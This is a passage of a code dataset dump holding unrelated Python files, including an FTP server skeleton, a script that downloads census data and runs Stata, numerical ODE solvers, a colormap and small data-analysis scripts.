q.log(self.lvname,self.prec)\n if head == atan:\n q = ev_args(self,f.args)\n return q.atan(self.lvname,self.prec)\n if head == tan:\n q = ev_args(self,f.args)\n return q.tan(self.lvname,self.prec)\n if head == cosh:\n q = ev_args(self,f.args)\n return q.cosh(self.lvname,self.prec)\n if head == sinh:\n q = ev_args(self,f.args)\n return q.sinh(self.lvname,self.prec)\n if head == tanh:\n q = ev_args(self,f.args)\n return q.tanh(self.lvname,self.prec)\n if head == atanh:\n q = ev_args(self,f.args)\n return q.atanh(self.lvname,self.prec)\n raise NotImplementedError('case in __call__ not considered f=%s' % f)\n \n","sub_path":"sympy/polys/ltaylor.py","file_name":"ltaylor.py","file_ext":"py","file_size_in_byte":7358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"255896038","text":"#功能\n\"\"\"\n【1】 分为服务端和客户端,要求可以有多个客户端同时操作。\n 服务端循环接受客户端请求,客户端发起操作命令\n【2】 客户端可以查看服务器文件库中有什么文件。\n 服务器文件库:建一个文件库,查询文件库,返回文件库里的文件名,允许访问文件\n 客户端:发送查看请求,收到全部文件名\n【3】 客户端可以从文件库中下载文件到本地。\n 客户端读文件,将文件写入到新的文件中\n【4】 客户端可以上传一个本地文件到文件库。\n 服务端读文件,写入新的文件中保存\n【5】 使用print在客户端打印命令输入提示,引导操作\n\"\"\"\n#框架分析\n\"\"\"\n#1.技术点确定\n #并发模型:多线程并发\n #数据传输:tcp传输\n#2.结构设计\n #将基本文件操作功能封装为类\n#3.功能模块\n #第一步:搭建网络通信模型\n #查看文件列表\n #下载文件\n #上传文件\n #客户端退出\n#4.协议确定\n # L:请求文件列表\n # Q:退出\n # G:下载文件\n # P:上传文件\n\"\"\"\n\n\"\"\"\nftp 文件服务器,服务端\nenv : python3.6\n多进程/线程并发 socket\n\"\"\"\nfrom socket import *\nfrom threading import Thread\nimport sys,os\nimport time\n\n# 全局变量\nHOST = \"0.0.0.0\"\nPORT = 8080\nADDR = (HOST,PORT)\nFTP = \"folder\" # 文件库位置\n\n\n# 创建类实现服务器文件处理功能\nclass FTPServer(Thread):\n \"\"\"\n 查看列表,下载,上传,退出处理\n \"\"\"\n def __init__(self,connfd):\n self.connfd = connfd\n super().__init__()\n\n def do_list(self):\n # 获取文件列表\n files = os.listdir(FTP)\n if not files:\n self.connfd.send(\"文件库为空\".encode())\n return\n else:\n self.connfd.send(b'OK')\n time.sleep(0.1)\n # 拼接文件\n filelist = \"\"\n for file in files:\n if \".\" in file:\n filelist += file + '\\n'\n self.connfd.send(filelist.encode())\n\n def do_quit(self):\n self.connfd.send(\"退出进程\".encode())\n\n def do_get_file(self):\n pass\n def do_put_file(self):\n pass\n\n\n\n # 循环接收请求,分情况调用功能函数\n def run(self):\n while True:\n data = self.connfd.recv(1024).decode()\n if data ==\"L\":\n self.do_list()\n if data==\"Q\":\n self.do_quit()\n if data==\"G\":\n self.do_get_file()\n if data==\"P\":\n self.do_put_file()\n\n\n# 搭建网络服务端模型\ndef main():\n # 创建套接字\n s = socket()\n s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n s.bind(ADDR)\n s.listen(5)\n\n print(\"Listen the port 8080...\")\n\n # 循环等待客户端链接\n while True:\n try:\n c, addr = s.accept()\n print(\"Connect from\", addr)\n except KeyboardInterrupt:\n sys.exit('退出服务器')\n except Exception as e:\n print(e)\n continue\n\n # 创建线程处理请求\n client = FTPServer(c)\n client.setDaemon(True)\n client.start() # 运行run\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"PycharmProjects/python_file/month2/day10/ftp-server.py","file_name":"ftp-server.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"320121161","text":"from typing import List, Dict, Any, Union\nfrom dataclasses import dataclass\n\nfrom base.common.models.request import BaseRequestModelKeys, KwargsRequestModel, DataKeys\n\n\n@dataclass\nclass SetAssetsRequestParams(BaseRequestModelKeys):\n LOAN_NUMBER_ID: str = \"LoanNumberID\"\n\n\n@dataclass\nclass SetAssetsPayload:\n CUSTOMER_ID: str = \"CustomerID\"\n ASSET_ID: str = \"AssetID\"\n FIELDS: str = \"Fields\"\n\n\n@dataclass\nclass SetAssetsFieldNames:\n FIX_DESCRIPTION: str = \"Fix_Description\"\n MARKET_VALUE: str = \"Market_Value\"\n BOTH: str = \"Both\"\n\n\nclass SetAssetsRequest(KwargsRequestModel):\n data_payload = SetAssetsPayload\n REQUEST_PAYLOAD_KEY: str = \"Assets\"\n\n def __init__(self, loan_number_id, payload_dict, session_id, nonce, pretty_print, **kwargs):\n self.loan_number_id = loan_number_id\n super().__init__(session_id=session_id, nonce=nonce, payload=payload_dict, pretty_print=pretty_print, **kwargs)\n\n def to_params(self) -> Dict[str, Any]:\n args = super().to_params()\n args[SetAssetsRequestParams.LOAN_NUMBER_ID] = self.loan_number_id\n return args\n\n def build_payload(self) -> Dict[str, List[Dict[Any, Union[List[Dict[str, Any]], Any]]]]:\n payload_dict = {}\n\n # For all fields create a dual entry dictionary:\n # { FIELD_NAME: attr_name, FIELD_VALUE: attr_value }\n for payload_key in self.attr_list:\n if getattr(self, payload_key.lower(), None) is not None:\n\n if payload_key.title() == SetAssetsPayload.FIELDS:\n fields_list = []\n for key, value in getattr(self, payload_key).items():\n fields_list.append(\n {DataKeys.FIELD_NAME: key,\n DataKeys.FIELD_VALUE: value})\n payload_dict.update({SetAssetsPayload.FIELDS: fields_list})\n continue\n\n payload_dict.update({getattr(self.data_payload, payload_key.upper(), payload_key): getattr(self, payload_key.lower())})\n\n return {self.REQUEST_PAYLOAD_KEY: [payload_dict]}\n\n\nif __name__ == \"__main__\":\n import pprint\n kwargs = {\n \"asset_id\": 12345,\n \"customer_id\": 98765,\n \"fields\": {\n SetAssetsFieldNames.FIX_DESCRIPTION:\"Honda Civic\",\n SetAssetsFieldNames.MARKET_VALUE:1900000\n }\n }\n print(f\"KWARGS: {pprint.pformat(kwargs)}\")\n\n obj = SetAssetsRequest(loan_number_id=10000001, payload_dict=None, session_id=123456, nonce=123245687, pretty_print=False, **kwargs)\n print(f\"\\nPAYLOAD: {pprint.pformat(obj.payload)}\")\n\n print(\"\\nTesting SetLoanDataRequest - payload_dict\")\n obj_args = SetAssetsRequest(loan_number_id=986532147, vendor_name=\"test_vendor\", payload_dict=obj.payload,\n pretty_print=False, session_id=123456, nonce=123245687)\n print(f\"PAYLOAD: {pprint.pformat(obj_args.payload)}\")","sub_path":"APIs/assets/requests/set_assets.py","file_name":"set_assets.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"534350135","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\npython3 translation of script ot download dta files\nfor cross-platform compatibility\n\"\"\"\n\n# note: check for SSL certificates in OSX python3.6\n\nimport bs4\nfrom urllib.request import urlopen\nfrom urllib.request import urlretrieve\nfrom urllib.error import HTTPError\nimport urllib3\n#from multiprocessing.dummy import Pool # use threads for I/O bound tasks\nimport re\nimport zipfile\nimport os\nimport time\nfrom datetime import datetime\nfrom url2filename import url2filename \nimport subprocess\nimport tarfile\nimport glob\nimport sys\nfrom pandas import DataFrame\n\nif 'darwin' in sys.platform:\n print('Running \\'caffeinate\\' on MacOSX to prevent the system from sleeping')\n subprocess.Popen('caffeinate')\n\nprint(\"getting NBER do-files...\")\n# get dofiles\ndofiles = 'http://www.nber.org/data/cps_basic_progs.html' \nhtml_page = urlopen(dofiles)\nsoup = bs4.BeautifulSoup(html_page, \"html5lib\")\nurls = []\nfor link in soup.findAll('a'):\n match_dct = re.search('9[7-9].dct|[012][0-9]t?.dct', link.get('href'))\n match_do = re.search('9[7-9].do|[012][0-9]t?.do', link.get('href'))\n if match_dct:\n urls.append('http://www.nber.org' + link.get('href'))\n if match_do:\n urls.append('http://www.nber.org' + link.get('href'))\n\ndcts = []; dos = []\nfor url in urls:\n local_filename, headers = urlretrieve(url, url2filename(url))\n if re.search('.dct', local_filename):\n dcts.append(local_filename)\n if re.search('.do', local_filename):\n dos.append(local_filename)\n\nfor dct in dcts:\n with open(dct, 'r') as lines:\n tmp = lines.readline()\n txt = lines.read().splitlines(True)\n txt[0] = re.sub('dictionary using .*.raw', 'infile dictionary', tmp)\n with open(dct, 'w', encoding='latin1') as lines:\n lines.writelines(txt)\n\ntmp_readers = {\n range(201501,201801): 'cpsbjan2015.do', # remem ranges end at month+1 since zero-indexing\n range(201404,201413): 'cpsbapr2014.do',\n range(201401,201404): 'cpsbjan2014.do',\n range(201301,201313): 'cpsbjan13.do',\n range(201205,201213): 'cpsbmay12.do',\n range(201001,201205): 'cpsbjan10.do',\n range(200901,200913): 'cpsbjan09.do',\n range(200701,200813): 'cpsbjan07.do',\n range(200508,200613): 'cpsbaug05.do',\n range(200405,200508): 'cpsbmay04.do',\n range(200301,200405): 'cpsbjan03.do',\n range(199801,200213): 'cpsbjan98.do'}\n\nimport pandas\nimport datetime\nimport calendar\ntable = pandas.read_html('http://www.nber.org/data/cps_basic_progs.html')[1]\ntable[0][1] = table[0][1] + datetime.date.today().strftime('%B %Y')\nfor i in range(12):\n m = list(calendar.month_name)[i+1]\n table[0] = [re.sub(m + ' ([0-9]{4,})', '\\g<1>'+\"{:02d}\".format(i+1), x) for x in table[0]]\n\nfor nums in range(len(table[0])):\n num = re.findall('[0-9]{6,}', table[0][nums])\n #if re.match('.*Revised', table[0][8]):\n # return('do something with revised')\n if len(num) == 2:\n table[0][nums] = range(int(num[0]), int(num[1])+1)\n\ntable = table[1:]\ntmp_readers = dict(zip(table[0].tolist(), table[3].tolist()))\n\nreaders = {}\nfor k, v in tmp_readers.items():\n for key in k:\n readers[key] = v\n\n# get data\nurl = 'http://www.nber.org/data/cps_basic.html'\nhtml_page = urlopen(url)\nsoup = bs4.BeautifulSoup(html_page, \"html5lib\")\nurls = []\nfor link in soup.findAll('a'):\n match = re.search('[0-2][0-9]r?pub.zip', link.get('href'))\n if match:\n urls.append('http://www.nber.org' + link.get('href'))\n match2 = re.search('99r?pub.zip', link.get('href'))\n if match2:\n urls.append('http://www.nber.org' + link.get('href'))\n\n#zipped = [url2filename(url) for url in urls]\n#datfiles = ['cps' + re.search('[a-z]{3,}[0-9]+', z).group(0) + '.dat'\n# for z in zipped]\n#dtafiles = ['cps' + re.search('[a-z]{3,}[0-9]+', z).group(0) + '.dta'\n# for z in zipped]\n#files = list(zip(urls, zipped, datfiles, dtafiles))\n\n# check timestamp if in both places\n#candidates = set(dtafiles) & set(os.listdir())\n#cand = [x for x in files if x[3] in candidates]\n\nprint('checking versions of current files...')\n\nimport calendar\n#dtafiles = list()\n#for y in sorted(list(range(1999,datetime.now().year+1))):\n #if y == datetime.now().year:\n #months = calendar.month_abbr[1:datetime.now().month+1]\n #else:\n #months = calendar.month_abbr[1:13]\n #for x in months:\n #dtafiles.append('cps' + x.lower() + str(y)[2:4] + '.dta') \ndtafiles = ['cps' + re.search('[a-z]{3,}[0-9]+', u).group(0) + '.dta'\n for u in urls]\n \ndatfiles = [re.sub('dta', 'dat', x) for x in dtafiles]\n\n# get server timestamps:\npool = urllib3.HTTPConnectionPool('www.nber.org')\nts = [pool.request('HEAD', url) for url in urls]\n# drop missing dtafiles\nwhile [i.status for i in ts].count(404):\n i = [i.status for i in ts].index(404)\n ts.pop(i); dtafiles.pop(i); datfiles.pop(i); urls.pop(i)\nts = [i.headers['Last-Modified'] for i in ts]\n#ts = [urlopen(url).info()['Last-Modified'] for url in urls]\n\n# convert to POSIX\ntsdt = [datetime.datetime.strptime(i, '%a, %d %b %Y %H:%M:%S %Z') for i in ts]\ntsServer = [time.mktime(i.timetuple()) for i in tsdt] # to POSIX\n\n# get local timestamps\ntsLocal = list()\nfor i in dtafiles:\n try:\n tsLocal.append(os.stat('dta/' + i).st_mtime)\n except FileNotFoundError:\n tsLocal.append(0)\n\nkeys = urls\nvalues = list(zip(datfiles, dtafiles, tsServer, tsLocal))\nfiles = dict(zip(keys, values))\n\ntsdict = dict(zip(['url', 'server.ts', 'local.ts'], (urls, tsServer, tsLocal)))\ntsDF = DataFrame.from_dict(tsdict, dtype = 'int')\ntsDF = tsDF[['url', 'local.ts', 'server.ts']] # reorder\n\n# get urls of those that need to be replaced\ntsDF = tsDF[tsDF['local.ts'] < tsDF['server.ts']]\nprint('we need to download a few files:')\nprint(tsDF)\nurls = tsDF['url'].tolist()\nnewtime = tsDF['server.ts'].tolist()\n\nfiles = {k: files[k] for k in urls} # subset files\n\n# print('note: using Stata installation at /usr/local/stata15/') \n\nwhile urls:\n url = urls.pop(0)\n try:\n zip_path, headers = urlretrieve(url, url2filename(url))\n # this shouldn't be necessary anymore:\n #if url2filename(url) not in set(os.listdir()):\n #print('downloaded ' + url)\n except HTTPError: \n print('could not find ' + url)\n urls.append(url)\n next\n zip_ref = zipfile.ZipFile(zip_path, 'r')\n oldname = zip_ref.namelist().pop()\n newname = 'cps' + re.search('[a-z]{3,}[0-9]+', oldname).group(0) + '.dat'\n out = zip_ref.extractall()\n os.rename(oldname, newname)\n zip_ref.close()\n os.remove(zip_path)\n print('extracted ' + newname)\n datafile = newname\n # find readerid associated with this file\n yrs = range(1995,2040)\n i1 = [str(x)[2:4] for x in yrs].index(datafile[6:8])\n mos = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec']\n i2 = mos.index(datafile[3:6]) + 1 # since zero-indexed\n readerid = int(\n str(yrs[i1]) + \"{:02d}\".format(i2))\n # get some filenames\n reader = readers[readerid]\n dct = re.sub('do', 'dct', reader)\n dta = re.sub('dat', 'dta', datafile) \n # substitute items in do-file to match our object\n with open(reader, 'r', encoding = \"ISO-8859-1\") as readerlines:\n text = []\n for line in readerlines:\n line = re.sub('(local d.._name )\"(.*)\"', '\\g<1>\\g<2>', line) # drops quotes\n line = re.sub('local dat.*dat', 'local dat_name '+ datafile, line)\n line = re.sub('local dta.*dta', 'local dta_name '+ dta, line)\n line = re.sub('local dct.*dct', 'local dct_name '+ dct, line)\n text.append(line)\n with open(reader, 'w', encoding='latin1') as readerlines:\n readerlines.writelines(text)\n # now you can run /usr/local/stata15/stata or just have stata on path\n subprocess.run(['stata', '-e', 'do', reader])\n os.utime(dta, (time.time(), files[url][2]))\n\n \n\n#def download(url):\n# local_filename, headers = urlretrieve(url, url2filename(url))\n# zipped.append(local_filename)\n# with Pool(3) as p:\n# print(p.map(download, urls))\n# result = Pool(4).map(urlretrieve, urls) # use 4 threads to download files concurrently\n\n\n# the do-files were written with Latin-1 encoding, so they should be read as\n# such, or they can be replaced with unicode encoding, basics of which are:\n# from bs4 import UnicodeDammit\n# dammit = UnicodeDammit(\"Mayag\\xfcez\")\n# print(dammit.unicode_markup)\n \n#for do in dos:\n# text = []\n# with open(do, 'r', encoding = \"ISO-8859-1\") as lines: # not sure why this \n# # encoding works if unicode doesn't\n# for lineno,line_i in enumerate(lines):\n# if re.search(\"#delimit cr\", line_i):\n# delimline = lineno\n# if re.search(\"save.*d\", line_i):\n# saveline = lineno\n# line_i = re.sub('/homes/data/cps-basic/', '', line_i)\n# line_i = re.sub('/homes/data/cps-basic/', '', line_i)\n# text.append(line_i)\n# if saveline < delimline:\n# # add semicolon\n# text[saveline] = re.sub('\\(save.*\\)', '\\1;\\n', text[saveline])\n# else:\n# # remove semicolon if there\n# text[saveline] = re.sub('\\(save.*replace\\);', '\\1\\n', text[saveline])\n# del saveline, delimline\n# with open(do, 'w') as lines:\n# lines.writelines(text)\n\ndatafiles = glob.glob('*dat')\ndtafiles = glob.glob('*dta')\ndatafiles = [re.sub('dat', 'dta', x) for x in datafiles]\ndatafiles = list(set(datafiles) - set(dtafiles))\ndatafiles = [re.sub('dta', 'dat', x) for x in datafiles]\n\n\n# in May 2017, should read 220 files\n\n# calculate dec 2007 reweights\nreweights = 'cpsrwdec07.zip'\nurlretrieve('http://www.nber.org/cps-basic/cpsrwdec07.zip', reweights)\nwith open(reweights, 'rb') as zipf:\n z = zipfile.ZipFile(zipf, 'r')\n z.extractall()\nos.remove(reweights)\nwith open('cpsrwdec07.do', 'r') as reader:\n text = []\n for line in reader:\n line = re.sub('local dat.*dat\"', \n 'local dat_name '+ re.sub('zip', 'dat', reweights), line)\n text.append(line)\nwith open('cpsrwdec07.do', 'w') as reader:\n reader.writelines(text)\n\nsubprocess.run(['stata', '-e', 'do', re.sub('zip', 'do', reweights)])\n\n# now get other revised weights\nos.chdir('new_weights_2000-2002')\nurl = 'https://thedataweb.rm.census.gov/pub/cps/basic/199801-/pubuse2000_2002.tar.zip'\nurlretrieve(url, url2filename(url))\nwith open('pubuse2000_2002.tar.zip', 'rb') as zipf:\n z = zipfile.ZipFile(zipf, 'r')\n z.extractall()\nos.remove('pubuse2000_2002.tar.zip')\ntarf = glob.glob('*tar')[0]\nwith tarfile.TarFile.open(tarf) as tar:\n tar.extractall()\nos.remove(tarf)\ndatafiles = glob.glob('*.dat')\nfor datafile in datafiles:\n os.chmod(datafile, 777)\n\n# TO DO: is the following really necessary if not doing reweights?\nsubprocess.run(['stata', '-e', 'do', 'init.do'])\n \nfor datafile in datafiles:\n os.remove(datafile)\n\nos.chdir('..')\nsubprocess.run(['stata', '-e', 'do', 'add_weights_monthly.do'])\n\n# clean up\nfor file in glob.glob('*.dat'):\n os.remove(file)\nos.makedirs('dta', exist_ok = True)\nfor file in glob.glob('*.dta'):\n os.rename(file, 'dta/'+file)\nos.makedirs('logs', exist_ok = True)\nfor file in glob.glob('*.log'):\n os.rename(file, 'logs/'+file)\nos.makedirs('dofiles', exist_ok = True)\nfor file in glob.glob('*.do'):\n os.rename(file, 'dofiles/'+file)\nfor file in glob.glob('*.dct'):\n os.rename(file, 'dofiles/'+file)\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"data/get_dta_files.py","file_name":"get_dta_files.py","file_ext":"py","file_size_in_byte":11453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"176988319","text":"\"\"\"\r\nAuraQI module providing various custom colormaps.\r\n\r\nAuthor: Wes Hamlyn\r\nCreated: 19-Dec-2016\r\nLast Mod: 19-Dec-2016\r\n\r\nCopyright 2016 Wes Hamlyn\r\n\r\nLicensed under the Apache License, Version 2.0 (the \"License\");\r\nyou may not use this file except in compliance with the License.\r\nYou may obtain a copy of the License at\r\n\r\n http://www.apache.org/licenses/LICENSE-2.0\r\n\r\nUnless required by applicable law or agreed to in writing, software\r\ndistributed under the License is distributed on an \"AS IS\" BASIS,\r\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\nSee the License for the specific language governing permissions and\r\nlimitations under the License.\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom matplotlib.colors import ListedColormap\r\n\r\n\r\ndef petrel(direction='normal'):\r\n \"\"\"\r\n Returns the equivalent of the colormap named \"Petrel\" in RokDoc.\r\n \"\"\"\r\n \r\n import numpy as np\r\n import matplotlib as mpl\r\n \r\n n1 = 80\r\n r1 = np.linspace(255, 191, n1)\r\n g1 = np.linspace(255, 0, n1)\r\n b1 = np.linspace(0, 0, n1)\r\n \r\n n2 = 20\r\n r2 = np.linspace(191, 97, n2)\r\n g2 = np.linspace(0, 69, n2)\r\n b2 = np.linspace(0, 0, n2)\r\n \r\n n3 = 20\r\n r3 = np.linspace(97, 202, n3)\r\n g3 = np.linspace(69, 202, n3)\r\n b3 = np.linspace(0, 202, n3)\r\n \r\n r4 = np.linspace(202, 77, n3)\r\n g4 = np.linspace(202, 77, n3)\r\n b4 = np.linspace(202, 77, n3)\r\n \r\n r5 = np.linspace(77, 0, n2)\r\n g5 = np.linspace(77, 0, n2)\r\n b5 = np.linspace(77, 191, n2)\r\n \r\n r6 = np.linspace(0, 161, n1)\r\n g6 = np.linspace(0, 255, n1)\r\n b6 = np.linspace(191, 255, n1)\r\n \r\n r = np.hstack([r1, r2, r3, r4, r5, r6])\r\n g = np.hstack([g1, g2, g3, g4, g5, g6])\r\n b = np.hstack([b1, b2, b3, b4, b5, b6])\r\n cmap = np.vstack([r, g, b]).T / 255.0\r\n \r\n if direction == 'reverse':\r\n cmap = np.flipud(cmap)\r\n \r\n return ListedColormap(cmap, name='petrel')\r\n ","sub_path":"auralib/cmaps.py","file_name":"cmaps.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"422196089","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 22 20:36:17 2019\r\n\r\n@author: billy\r\n\"\"\"\r\n\r\n\"\"\" This is a numeric differential equation solver \"\"\"\r\nif __name__ == \"__main__\":\r\n print(\"This is the Numerical Solver program.\")\r\n print(\"To run the programm run Excecution.py\")\r\n\r\n##functions\r\n## functions for numeric diff.eq solving\r\ndef EF(Time,w,dt, F):\r\n ''' Euler forward numerical integration method\r\n w_(n+1)=w_n+dt*f(tn,wn)\r\n \r\n Computational easiest integration method and Analysticly worst\r\n \r\n input is a w matrix consisting of w=[w0,w1,w2,...,wn]\r\n with wi=[u1(i),u2(i),u3(i),...,um(i)]^T\r\n \r\n Returns: wn+1=[u1(n+1),u2(n+1),...,un(n+1)]^T'''\r\n \r\n ans=w[:,:,-1:]+dt*F(Time[-1],w[:,:,-1:]);\r\n return(ans)\r\n\r\ndef TZ(Time,w,dt, F):\r\n ''' Trapezodial numerical integration method\r\n w_(n+1)=w_n+dt*(f(t_n,w_n)+f(tn+dt,w*_(n+1)))/2\r\n with w*_(n+1)=w_n+dt*f(tn,wn)\r\n \r\n Averge on computuational time and averge on analytics\r\n \r\n input is a w matrix consisting of w=[w0,w1,w2,...,wn]\r\n with wi=[u1(i),u2(i),u3(i),...,um(i)]^T\r\n \r\n Returns: wn+1=[u1(n+1),u2(n+1),...,un(n+1)]^T'''\r\n \r\n \r\n \r\n ans= w[:,:,-1:]+dt/2*(F(Time[-1],w[:,:,-1:])+F(Time[-1]+dt,w[:,:,-1:]+dt*F(Time[-1],w[:,:,-1:])));\r\n \r\n return(ans)\r\n \r\ndef RK(Time,w,dt, F):\r\n ''' Runge-Kutta integrtion method\r\n w_(n+1)=w_n+1/6(k1+2k2+2k3+k4)\r\n \r\n with k1=dt*f(tn,wn)\r\n k2=dt*f(tn+dt/2,w_n+k1/2) \r\n k3=dt*f(tn+dt/2,w_n+k2/2)\r\n k4=dt*f(t_n+dt,w_n+k3)\r\n \r\n Computationaly the hardest method but analystically the best.\r\n \r\n input is a w matrix consisting of w=[w0,w1,w2,...,wn]\r\n with wi=[u1(i),u2(i),u3(i),...,um(i)]^T\r\n \r\n Returns: wn+1=[u1(n+1),u2(n+1),...,un(n+1)]^T'''\r\n \r\n k1=dt*F(Time[-1],w[:,:,-1:])\r\n \r\n k2=dt*F(Time[-1]+dt/2,w[:,:,-1:]+k1/2)\r\n \r\n k3=dt*F(Time[-1]+dt/2,w[:,:,-1:]+k2/2)\r\n \r\n k4=dt*F(Time[-1]+dt,w[:,:,-1:]+k3)\r\n \r\n ans=w[:,:,-1:]+1/6*(k1+2*k2+2*k3+k4)\r\n \r\n return(ans)\r\n ","sub_path":"NumericalSolvers.py","file_name":"NumericalSolvers.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"593792385","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\n#Create data\nx=np.array([0.,0.5,1.])\ny_exact=np.array([0.,1.,1.])\n\n#Intiliase W and b\nW=0.5\nb=0.5\n\n#Set other constants\nN=3\neta=0.01\nMaxIter=16\n\n#Initialise approximation\nF=W * x + b\n\n#Functions\ndef cost():\n return (1/N) * np.sum( 0.5* (y_exact - F)**2 )\n#Partial derivates of cost\ndef cost_W(k):\n return (1/N) * np.sum( x[k]*(W*x[k]- y_exact[k] +b) )\ndef cost_b(k):\n return (1/N) * np.sum( W*x[k] - y_exact[k] + b )\n\n#Cost_vec\ncost_vec=np.empty(MaxIter)\nj=np.arange(0,MaxIter,1)\nw_vec=np.empty(MaxIter)\nb_vec=np.empty(MaxIter)\n\n#Peform stochastic gradient descent\nfor i in range(0,MaxIter):\n #Pick random index\n k=random.randint(0, (N-1))\n w_vec[i]=W\n b_vec[i]=b\n #Forward pass\n F=W*x+b\n #Alter weights and biases\n W= W - eta * cost_W(k)\n b= b - eta * cost_b(k)\n #Calculate newcost\n newcost=cost()\n cost_vec[i]=newcost\n\n #print(newcost)\n\nplt.plot(j,cost_vec)\nplt.title(f'Cost Eta={eta} MaxIter={MaxIter}')\nplt.xlabel('Iteration')\nplt.ylabel('Cost for SGD')\nplt.show()\n\nfor i in range(0,MaxIter):\n print(f'{w_vec[i]} & {b_vec[i]} & {cost_vec[i]}')","sub_path":"CAMCW2/Q4d.py","file_name":"Q4d.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"315922431","text":"# sample point\nimport matplotlib\nmatplotlib.use('agg')\nfrom matplotlib import pyplot as plt\nimport geopandas as gpd\nfrom shapely.geometry import Point\nimport ast, rasterio\nfrom affine import Affine\nimport xarray as xr\nimport numpy as np\nimport datetime\nimport seaborn as sns\n\nx,y = (-1915085, 937121)\npt = Point(x,y)\n\ngdf = gpd.GeoDataFrame( {'id':[1],'geometry':[pt]}, crs={'init':'epsg:3411'}, geometry='geometry' )\ngdf.to_file( '/workspace/Shared/Tech_Projects/SeaIce_NOAA_Indicators/project_data/nsidc_0051/test_point_ak.shp' )\nnetcdf_fn = '/workspace/Shared/Tech_Projects/SeaIce_NOAA_Indicators/project_data/nsidc_0051/NetCDF/nsidc_0051_sic_nasateam_1978-2017_Alaska.nc'\nds = xr.open_dataset( netcdf_fn )\n\na = Affine(*ast.literal_eval(ds.affine_transform)[:6])\ncol, row = ~a * (x, y)\nrow, col = np.array([row,col]).astype(int)\n\n# rst = rasterio.open('/workspace/Shared/Tech_Projects/SeaIce_NOAA_Indicators/project_data/nsidc_0051/GTiff/alaska/1978/nt_19781026_n07_v1-1_n.tif')\n# arr = rst.read(1)\n# arr[row,col] #<- select a single profile for testing\n\nprofile = ds.sic[:,row,col]\np2 = profile.resample( time='M' ).mean( 'time' )\nyears = [str(i) for i in range(1979,2017)]\nd = dict()\nfor year in years:\n\tp = p2.sel( time=year )\n\td[year] = p.data\n\tp.plot()\n\tplt.savefig('/workspace/Shared/Tech_Projects/SeaIce_NOAA_Indicators/project_data/tmp/test_year_profile_monthly_{}.png'.format(year))\n\tplt.close()\n\n\nmonths = [datetime.date(2000, m, 1).strftime('%B')[:3] for m in range(1, 13)]\ndf = pd.DataFrame( d ).T\ndf.columns = months\n\nsns.heatmap( df, cmap='Blues_r' )\nplt.savefig( '/workspace/Shared/Tech_Projects/SeaIce_NOAA_Indicators/project_data/tmp/heatmap_profile_monthly.png' )\nplt.close()\n\n\n","sub_path":"other_code/select_profile_using_xy.py","file_name":"select_profile_using_xy.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"174705435","text":"\r\n\r\ndef display(mat, grid_height, grid_width):\r\n for i in range(0, grid_height):\r\n print(mat[i])\r\n\r\n\r\ndef count_on(mat, grid_height, grid_width):\r\n c = 0\r\n for i in range(0, grid_height):\r\n for j in range(0, grid_width):\r\n if mat[i][j] == 1:\r\n c += 1\r\n return c\r\n\r\n\r\ndef is_valid(x, y, grid_width, grid_height):\r\n return (0 <= x < grid_width) and (0 <= y < grid_height)\r\n\r\n\r\ndef switch_off(mat, grid_width, grid_height, conn_x1, conn_y1, conn_x2, conn_y2, x, y):\r\n if mat[y][x] == 0:\r\n return\r\n else:\r\n print(\"Switching off ({0}, {1})\".format(x, y))\r\n mat[y][x] = 0\r\n\r\n x1 = x + conn_x1\r\n y1 = y + conn_y1\r\n x2 = x + conn_x2\r\n y2 = y + conn_y2\r\n if is_valid(x1, y1, grid_width, grid_height):\r\n switch_off(mat, grid_width, grid_height, conn_x1, conn_y1, conn_x2, conn_y2, x1, y1)\r\n if is_valid(x2, y2, grid_width, grid_height):\r\n switch_off(mat, grid_width, grid_height, conn_x1, conn_y1, conn_x2, conn_y2, x2, y2)\r\n\r\n\r\ndef num_illuminated(grid_width, grid_height, conn_x1, conn_y1, conn_x2, conn_y2, start_x, start_y):\r\n \"\"\"\r\n grid_width - the width of the room grid\r\n grid_height - the height of the room grid\r\n conn_x1 - the x-coordinate of the first lamp connection\r\n conn_y1 - the y-coordinate of the first lamp connection\r\n conn_x2 - the x-coordinate of the second lamp connection\r\n conn_y2 - the y-coordinate of the second lamp connection\r\n start_x - the x-coordinate of the first lamp turned off\r\n start_y - the y-coordinate of the first lamp turned off\r\n \"\"\"\r\n mat = []\r\n for i in range(0, grid_height):\r\n mat.append([])\r\n for j in range(0, grid_width):\r\n mat[i].append(1)\r\n display(mat, grid_height, grid_width)\r\n if is_valid(start_x, start_y, grid_width, grid_height):\r\n # new_mat = switch_off(mat, grid_width, grid_height, conn_x1, conn_y1, conn_x2, conn_y2, start_x, start_y)\r\n switch_off(mat, grid_width, grid_height, conn_x1, conn_y1, conn_x2, conn_y2, start_x, start_y)\r\n\r\n return count_on(mat, grid_height, grid_width)\r\n # return count_on(new_mat, grid_height, grid_width)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(num_illuminated(5, 3, 0, 0, 0, 0, 4, 2))\r\n # 